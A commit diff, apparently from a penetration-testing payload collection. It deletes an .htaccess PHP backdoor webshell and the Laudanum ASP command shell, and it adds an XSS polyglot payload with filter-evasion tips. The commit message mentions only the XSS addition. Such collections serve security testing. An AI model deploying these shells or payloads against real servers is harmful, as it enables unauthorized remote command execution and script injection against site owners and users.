Add advanced XSS polyglot payloads and explanations to 2 - XSS Polyglot.md

Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell

@@ -1,23 +0,0 @@
-# htaccess backdoor shell
-# this is relatively stealthy compared to a typical webshell
-
-# overriding deny rule
-# making htaccess accessible from the internet
-# without this you'll get a HTTP 403
-<Files ~ "^\.ht">
-Require all granted
-Order allow,deny
-Allow from all
-</Files>
-
-# Make the server treat .htaccess file as .php file
-AddType application/x-httpd-php .htaccess
-
-# <?php system($_GET['cmd']); ?>
-
-# To execute commands you would navigate to:
-# http://vulnerable.com/.htaccess?cmd=YourCommand
-
-# If system(); isnt working then try other syscalls
-# e.g. passthru(); shell_exec(); etc
-# If you still cant execute syscalls, try bypassing php.ini via htaccess

Upload Insecure Files/Extension ASP/shell.asp

@@ -1,83 +0,0 @@
-<%
-' *******************************************************************************
-' ***
-' *** Laudanum Project
-' *** A Collection of Injectable Files used during a Penetration Test
-' ***
-' *** More information is available at:
-' ***  http://laudanum.secureideas.net
-' ***  laudanum@secureideas.net
-' ***
-' ***  Project Leads:
-' ***         Kevin Johnson <kjohnson@secureideas.net
-' ***         Tim Medin <tim@securitywhole.com>
-' ***
-' *** Copyright 2012 by Kevin Johnson and the Laudanum Team
-' ***
-' ********************************************************************************
-' ***
-' ***   Updated and fixed by Robin Wood <Digininja>
-' ***   Updated and fixed by Tim Medin <tim@securitywhole.com
-' ***
-' ********************************************************************************
-' *** This program is free software; you can redistribute it and/or
-' *** modify it under the terms of the GNU General Public License
-' *** as published by the Free Software Foundation; either version 2
-' *** of the License, or (at your option) any later version.
-' ***
-' *** This program is distributed in the hope that it will be useful,
-' *** but WITHOUT ANY WARRANTY; without even the implied warranty of
-' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-' *** GNU General Public License for more details.
-' ***
-' *** You can get a copy of the GNU General Public License from this
-' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
-' *** You can also write to the Free Software Foundation, Inc., Temple
-' *** Place - Suite  Boston, MA   USA.
-' ***
-' ***************************************************************************** */
-
-
-' can set this to 0 for never time out but don't want to kill the server if a script
-' goes into a loop for any reason
-Server.ScriptTimeout = 180
-
-ip=request.ServerVariables("REMOTE_ADDR")
-if ip<>"1.2.3.4" then
- response.Status="404 Page Not Found"
- response.Write(response.Status)
- response.End
-end if
-
-if Request.Form("submit") <> "" then
-   Dim wshell, intReturn, strPResult
-   cmd = Request.Form("cmd")
-   Response.Write ("Running command: " & cmd & "<br />")
-   set wshell = CreateObject("WScript.Shell")
-   Set objCmd = wShell.Exec(cmd)
-   strPResult = objCmd.StdOut.Readall()
-
-   response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>"
-
-   set wshell = nothing
-end if
-
-%>
-<html>
-<head><title>Laundanum ASP Shell</title></head>
-<body onload="document.shell.cmd.focus()">
-<form action="shell.asp" method="POST" name="shell">
-Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br />
-<input type="submit" name="submit" value="Submit" />
-<p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done.
-<p>Example command to do a directory listing:<br>
-%ComSpec% /c dir
-</form>
-<hr/>
-<address>
-Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
-Written by Tim Medin.<br/>
-Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
-</address>
-</body>
-</html>

XSS Injection/2 - XSS Polyglot.md

@@ -84,3 +84,14 @@ A polyglot XSS is a type of cross-site scripting (XSS) payload designed to work
 
 * [Building XSS Polyglots - Brute - June 23, 2021](https://brutelogic.com.br/blog/building-xss-polyglots/)
 * [XSS Polyglot Challenge v2 - @filedescriptor - August 20, 2015](https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/)
+   
+
+ jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e                
+ 
+ # Advanced XSS Polyglot
+This payload is designed to execute across numerous HTML/JS contexts and evade standard filters by mixing comment styles, breaking out of tags, and leveraging lowercase event handlers. Use cases include testing various input sanitization weaknesses and filters.
+  # Crafting Tips
+- Mix encoding methods (URL, HTML entities, Unicode) to sneak past blacklists.
+- Use HTML breaking elements (`</textarea>`, `</script>`, etc.) to escape confined contexts.
+- Leverage less common event handlers (e.g., `onauxclick`, `ontoggle`) for advanced bypasses.
+